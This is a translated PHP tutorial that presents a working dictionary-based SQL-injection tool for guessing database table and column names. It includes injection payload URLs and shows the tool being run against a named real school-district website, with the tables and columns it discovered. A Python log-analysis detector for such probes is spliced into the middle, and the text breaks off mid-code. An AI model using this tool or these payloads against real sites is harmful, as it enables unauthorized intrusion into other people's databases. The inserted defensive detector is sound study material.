Do it all in PHP (writing an injection program) - PHP tutorial
WBOY
Release: 2016-07-13 17:21:32
Original
Article author: mika[EST]. Source: EST (邪恶八进制信息安全团队, Evil Octal Information Security Team)
Recently I've got hooked on scripting again, hehe~~~ I had just finished learning PHP and then read a few articles on PHP security, so I picked some sites from Google to practise on. It turned out that guessing table and column names through PHP injection is really tedious: scanners like NBSI have no feature for guessing table and column names with a dictionary or by brute force, so do I really have to guess them one at a time? I'm lazy :-) Then it occurred to me: didn't I just finish learning PHP? Why not put it to use? PHP is not only a web scripting language, it is also an excellent command-line interpreter, and writing scripts with it is very convenient. To save myself some effort the next time I run into this kind of problem, I wrote a PHP script to guess table and column names. The script is very simple; its contents are as follows:

<?php
echo " Universal Database tables explode exploit V0.1\n";
echo " Written by Mika[EST]\n";
//$keyword="Warning";
$keyword="error";
// Build the query template according to the number of arguments;
// MIKA_NAME is the placeholder that each dictionary word is substituted for.
switch($argc){
  case 3:
    $u=" and (select count(*) from MIKA_NAME)>0";
    $dic=$argv[2];
    break;
  case 4:
    $u=" and 1=1 union select ".implode(",",range(1,$argv[2]))." from MIKA_NAME#";
    $dic=$argv[3];
    break;
  case 5:
    if($argv[2]!="-t") exit("arguments Error");
    $u=" and (select count(MIKA_NAME) from $argv[3])>0#";
    $dic=$argv[4];
    break;
  case 6:
    if($argv[2]!="-t" || $argv[4]<1) exit("arguments Error");
    if($argv[4]>=2){
      $u=" and 1=1 union select MIKA_NAME,".implode(",",range(2,$argv[4]))." from $argv[3]#";
    }else{
      $u=" and 1=1 union select MIKA_NAME from $argv[3]#";
    }
    $dic=$argv[5];
    break;
  default:
    echo <<<USAGE
Usage:$argv[0] [OPTIONS]
OPTIONS:
number --->to indicate column number of a table during a union query
Attention:if you dont use [options] the program will use default mode to work.you can change it in the source code of this program.
USAGE;
    die;
}
$old=$argv[1];
file_exists($dic) or exit("dic file does not exist!\n");
$words=file($dic);
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080");
print "[+]Searching What you want...\n";
foreach($words as $word){
  //print $word;
  if(preg_match("/^\s*$/",$word)){   // skip blank dictionary lines
    //print "blank";
    continue;
  }
  $url=str_replace("MIKA_NAME",trim($word),$u);
  $url=$old.urlencode($url);
  //$url=$old.$url;
  curl_setopt($curl,CURLOPT_URL,$url);
  //print "source url is:".$url."\n";
  $content=curl_exec($curl);
  //$new=$content;
  //print $content;
  // No error keyword in the response means the guessed name exists
  if(preg_match("/$keyword/i",$content)==0){
    print "[*] FOUND:".trim($word);
  }else{
    print ".";
  }
}
?>

Let me explain first. The module the program relies on is curl, which makes fetching page content very convenient. My PHP is the Windows build, so many modules are bundled with it, but curl is not enabled by default and you have to turn it on. The method is simple: download the latest portable (zip) release of PHP (no installer needed, easy to carry around), copy php.ini-recommended from the archive into the system directory (winnt on Win2k, windows on XP and later), rename it to php.ini, open it in Notepad and find the following line:

extension_dir =

Set its value to your own path; for example, if you extracted the archive to c:\php, you need to set it to:

extension_dir = "c:\php\ext"
Then keep looking for the following section:

; Windows Extensions
; Note that ODBC support is built in, so no dll is needed for it.
; Note that many DLL files are located in the extensions/ (PHP 4) ext/ (PHP 5)
; extension folders as well as the separate PECL DLL download (PHP 5).
; Be sure to appropriately set the extension_dir directive.

;extension=php_mbstring.dll
;extension=php_bz2.dll
;extension=php_curl.dll
;extension=php_dba.dll
;extension=php_dbase.dll
;extension=php_exif.dll
;extension=php_fdf.dll
;extension=php_filepro.dll
;extension=php_gd2.dll
;extension=php_gettext.dll
;extension=php_ifx.dll

See php_curl.dll? Just remove the semicolon in front of it and save. It's not over yet: go to the php directory and find these two files:

libeay32.dll
ssleay32.dll
Copy them to the system32 directory and you're done. Very simple, right? Then add your PHP directory to the PATH environment variable so that you can call php.exe directly from any directory. Installing other modules follows similar steps, so I won't go into details :-)
Getting back to the subject: once you have done the above, you can use the curl module. Using the program is very simple. Suppose the injectable URL looks like this: http://www.aaa.com/bbb.asp?ccc=56, and your dictionary file, mydict.txt, is in the current directory. Then you run the program like this:

php explode.php http://www.aaa.com/bbb.asp?ccc=56 mydict.txt
Note that since I originally wrote this program for my own use, it does not handle many cases. The program decides whether a guess hit by looking at the content the page returns, so you first have to find a suitable keyword by hand. For example, request:

http://www.aaa.com/bbb.asp?ccc=56 and (select count(*) from mika520)>0 (on Access and MSSQL)

or

http://www.aaa.com/bbb.asp?ccc=56 and 1=1 union select 1,2,3,4,5,6 from mika520%23 (MySQL)

Here mika520 is a table that does not exist. When the page comes back, look at its source and pick a string that does not appear in the correct page as the keyword (injection tools such as NBSI key on the correct page by default; I did the opposite :-)), then replace the value of $keyword in line 4 of the program with your keyword. For example, take this site: http://www.elkhart.k12.in.us/content.php?id=157
Since it is PHP, you have to use the second way of guessing, i.e. a union query, so first confirm that the injection point exists and then use order by to determine the number of fields. Here I determined that there are 5 fields. Once that is done, you can run my program to guess. The result is as follows:

F:\scripts\php\mine>php forcetb1.php http://www.elkhart.k12.in.us/content.php?id=157 5 mydict.txt
Universal Database tables explode exploit V0.1
Written by Mika[EST]
[+]Searching What you want...
...[*] FOUND:structure........................................................

Did you see it? Found a table, haha. Let's take a look at its fields:

F:\scripts\php\mine>php forcetb1.php http://www.elkhart.k12.in.us/content.php?id=157 -t structure 5 temp.txt
Universal Database tables explode exploit V0.1
Written by Mika[EST]
[+]Searching What you want...
[*] FOUND:division......[*] FOUND:id.[*] FOUND:level..........[*] FOUND:title......[*] FOUND:content..[*] FOUND:parent_id....

Very simple, right? The 5 in the command is the number of fields you determined with order by; replace it with the actual number. If it is an Access or MSSQL database, just omit the field-count argument (the 5 in the example). I won't do more demonstrations.
If you encounter problems while using it, you can change the code yourself, it’s very simple:-)
In addition, my program uses an HTTP proxy by default, so you need to modify this line:

curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080");

Replace it with your own proxy, or comment it out if you don't need one.
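Seen from the server side, a dictionary run like the one above leaves a very regular trail: one request per word, each carrying either "and (select count(X) from NAME)>0" or "union select 1,2,... from NAME#", all from one client. The following Python script is an added example (not part of the article or the author's tool) that parses constructed common-log-format lines for the article's placeholder URL /bbb.asp?ccc=56, recovers the guessed table or column name from each probe-shaped request, and flags clients that sent a burst of them; the sample log lines, IP addresses and the min_probes threshold are all made up for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines in common log format (not from the article); the
# 10.0.0.9 requests have the shape of the script's two probe types.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Jul/2016:17:21:32 +0000] "GET /bbb.asp?ccc=56 HTTP/1.1" 200 5120
10.0.0.9 - - [13/Jul/2016:17:21:40 +0000] "GET /bbb.asp?ccc=56+and+1%3D1+union+select+1%2C2%2C3%2C4%2C5%2C6+from+users%23 HTTP/1.1" 200 310
10.0.0.9 - - [13/Jul/2016:17:21:41 +0000] "GET /bbb.asp?ccc=56+and+1%3D1+union+select+1%2C2%2C3%2C4%2C5%2C6+from+structure%23 HTTP/1.1" 200 5120
10.0.0.9 - - [13/Jul/2016:17:21:42 +0000] "GET /bbb.asp?ccc=56+and+%28select+count%28id%29+from+structure%29%3E0%23 HTTP/1.1" 200 5120
10.0.0.7 - - [13/Jul/2016:17:22:01 +0000] "GET /bbb.asp?ccc=57 HTTP/1.1" 200 4990
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')
# "... union select 1,2,... from NAME#": the guessed name is a table
UNION_RE = re.compile(r"union\s+select\b.*?\bfrom\s+([A-Za-z_]\w*)", re.I | re.S)
# "... and (select count(X) from T)>0": X='*' guesses table T, otherwise column X of T
COUNT_RE = re.compile(r"select\s+count\(\s*(\*|[A-Za-z_]\w*)\s*\)\s+from\s+([A-Za-z_]\w*)", re.I)

def probe_name(request_path):
    """Return ('table', name) or ('column', name) when the decoded query string
    has the shape of a dictionary probe, else None."""
    query = unquote_plus(request_path.partition("?")[2])
    m = COUNT_RE.search(query)
    if m:
        col, table = m.groups()
        return ("table", table) if col == "*" else ("column", col)
    m = UNION_RE.search(query)
    return ("table", m.group(1)) if m else None

def probes_by_ip(log_text):
    """Map client IP -> list of (kind, guessed name) for probe-shaped requests."""
    found = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m.groups()
        probe = probe_name(path)
        if probe:
            found[ip].append(probe)
    return dict(found)

def flag_bruteforce(log_text, min_probes=3):
    """IPs that sent at least min_probes probes; a dictionary run sends one request
    per word, so the count climbs far above anything a normal visitor produces."""
    return {ip: len(p) for ip, p in probes_by_ip(log_text).items() if len(p) >= min_probes}
```

Because the guesser keys on an error keyword in the response, the requests that "hit" return the normal page; correlating by request shape and client rather than by status code is what makes the run visible.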
Actually, when guessing, the key is whether your dictionary is good enough. You can simply merge your usual dictionaries, for example take the dictionaries from NBSI and Kuangzhugang and combine them into one file. However, these two dictionaries may overlap a lot, and to avoid unnecessary guessing the duplicates should be removed. I have written a very simple PHP program to help you remove duplicate lines, as follows:
if($argc!=2){ echo << Write